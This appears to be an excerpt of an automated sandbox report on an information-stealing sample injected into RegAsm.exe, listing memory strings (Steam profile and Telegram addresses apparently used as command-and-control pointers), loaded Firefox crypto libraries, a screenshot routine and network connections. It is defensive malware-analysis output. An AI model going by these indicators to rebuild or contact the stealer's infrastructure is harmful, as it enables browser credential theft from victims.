                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://steamcommunity.com/market/
                      Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                      Source: file.exe, 00000000.00000002.1702569185.0000000003EC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.1976459689.00000000015FE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199658817715
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://steamcommunity.com/profiles/76561199658817715/badges
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://steamcommunity.com/profiles/76561199658817715/inventory/
                      Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199658817715c
                      Source: file.exe, 00000000.00000002.1702569185.0000000003EC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199658817715https://t.me/sa9okCristina
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://steamcommunity.com/workshop/
                      Source: 76561199658817715[1].htm.3.drString found in binary or memory: https://store.steampowered.com/
                      Source: 76561199658817715[1].htm.3.drString found in binary or memory: https://store.steampowered.com/about/
                      Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://store.steampowered.com/explore/
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://store.steampowered.com/legal/
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://store.steampowered.com/mobile
                      Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://store.steampowered.com/news/
                      Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://store.steampowered.com/points/shop/
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://store.steampowered.com/stats/
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                      Source: IIJDBGDGCGDAKFIDGIDBFIEHDH.3.drString found in binary or memory: https://support.mozilla.org
                      Source: IIJDBGDGCGDAKFIDGIDBFIEHDH.3.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                      Source: IIJDBGDGCGDAKFIDGIDBFIEHDH.3.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                      Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, EGIDAAFI.3.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                      Source: EGIDAAFI.3.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                      Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, EGIDAAFI.3.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                      Source: EGIDAAFI.3.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                      Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
                      Source: file.exe, 00000000.00000002.1702569185.0000000003EC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/sa9ok
                      Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: https://www.digicert.com/CPS0
                      Source: ECFHIJKJ.3.drString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: ECFHIJKJ.3.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: IIJDBGDGCGDAKFIDGIDBFIEHDH.3.drString found in binary or memory: https://www.mozilla.org
                      Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                      Source: IIJDBGDGCGDAKFIDGIDBFIEHDH.3.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                      Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/ost.exe
                      Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                      Source: IIJDBGDGCGDAKFIDGIDBFIEHDH.3.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                      Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/xe
                      Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                      Source: IIJDBGDGCGDAKFIDGIDBFIEHDH.3.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                      Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
                      Source: IIJDBGDGCGDAKFIDGIDBFIEHDH.3.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                      Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                      Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
                      Source: IIJDBGDGCGDAKFIDGIDBFIEHDH.3.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                      Source: unknownHTTPS traffic detected: 104.112.44.153:443 -> 192.168.2.4:49731 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 78.46.229.36:443 -> 192.168.2.4:49732 version: TLS 1.2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00411BD0 memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,3_2_00411BD0

                      System Summary

                      barindex
                      .NET source code contains very large array initializations
                      Source: file.exe, RemoteObjects.csLarge array initialization: RemoteObjects: array initializer size 208384
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6FED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,3_2_6C6FED10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C73B8C0 rand_s,NtQueryVirtualMemory,3_2_6C73B8C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C73B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,3_2_6C73B910
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C73B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,3_2_6C73B700
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6DF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,3_2_6C6DF280
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02D30EEF0_2_02D30EEF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041F0F03_2_0041F0F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041CA693_2_0041CA69
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041DBE73_2_0041DBE7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041CFBA3_2_0041CFBA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6D35A03_2_6C6D35A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C715C103_2_6C715C10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C74AC003_2_6C74AC00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C716CF03_2_6C716CF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6E6C803_2_6C6E6C80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6EFD003_2_6C6EFD00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6FED103_2_6C6FED10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C710DD03_2_6C710DD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C746E633_2_6C746E63
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C713E503_2_6C713E50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C722E4E3_2_6C722E4E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6F9E503_2_6C6F9E50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C739E303_2_6C739E30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C717E103_2_6C717E10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6DBEF03_2_6C6DBEF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6EFEF03_2_6C6EFEF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C734EA03_2_6C734EA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6F5E903_2_6C6F5E90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6E9F003_2_6C6E9F00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C706FF03_2_6C706FF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6DDFE03_2_6C6DDFE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6F88503_2_6C6F8850
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6FD8503_2_6C6FD850
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C71B8203_2_6C71B820
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7248203_2_6C724820
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6E78103_2_6C6E7810
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7158E03_2_6C7158E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C72B9703_2_6C72B970
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6ED9603_2_6C6ED960
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6FA9403_2_6C6FA940
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C70D9B03_2_6C70D9B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6DC9A03_2_6C6DC9A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7329903_2_6C732990
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C719A603_2_6C719A60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6F1AF03_2_6C6F1AF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C718AC03_2_6C718AC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C742AB03_2_6C742AB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C704AA03_2_6C704AA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6ECAB03_2_6C6ECAB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C74BA903_2_6C74BA90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6E54773_2_6C6E5477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C74545C3_2_6C74545C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C74542B3_2_6C74542B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6DD4E03_2_6C6DD4E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6E64C03_2_6C6E64C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6FD4D03_2_6C6FD4D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7334A03_2_6C7334A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C73C4A03_2_6C73C4A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7005123_2_6C700512
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7385F03_2_6C7385F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6DC6703_2_6C6DC670
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6F46403_2_6C6F4640
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7256003_2_6C725600
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7476E33_2_6C7476E3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C73E6803_2_6C73E680
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7177103_2_6C717710
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7277A03_2_6C7277A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C71F0703_2_6C71F070
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6FC0E03_2_6C6FC0E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7450C73_2_6C7450C7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7060A03_2_6C7060A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C74B1703_2_6C74B170
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7151903_2_6C715190
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C71E2F03_2_6C71E2F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6D22A03_2_6C6D22A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6EC3703_2_6C6EC370
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6D53403_2_6C6D5340
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7453C83_2_6C7453C8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6DF3803_2_6C6DF380
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7FAC603_2_6C7FAC60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C84ECD03_2_6C84ECD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8B6C003_2_6C8B6C00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8CAC303_2_6C8CAC30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7EECC03_2_6C7EECC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C886D903_2_6C886D90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C97CDC03_2_6C97CDC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C978D203_2_6C978D20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C91AD503_2_6C91AD50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7F4DB03_2_6C7F4DB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8BED703_2_6C8BED70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C876E903_2_6C876E90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C890EC03_2_6C890EC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8D0E203_2_6C8D0E20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7FAEC03_2_6C7FAEC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C88EE703_2_6C88EE70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C938FB03_2_6C938FB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7F6F103_2_6C7F6F10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8CEFF03_2_6C8CEFF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7F0FE03_2_6C7F0FE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C930F203_2_6C930F20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C85EF403_2_6C85EF40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7FEFB03_2_6C7FEFB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8B2F703_2_6C8B2F70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8DC8C03_2_6C8DC8C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8F68E03_2_6C8F68E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8408203_2_6C840820
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C87A8203_2_6C87A820
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8C48403_2_6C8C4840
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8809A03_2_6C8809A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8AA9A03_2_6C8AA9A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8B09B03_2_6C8B09B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C90C9E03_2_6C90C9E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8249F03_2_6C8249F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8469003_2_6C846900
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8289603_2_6C828960
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C86EA803_2_6C86EA80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C89EA003_2_6C89EA00
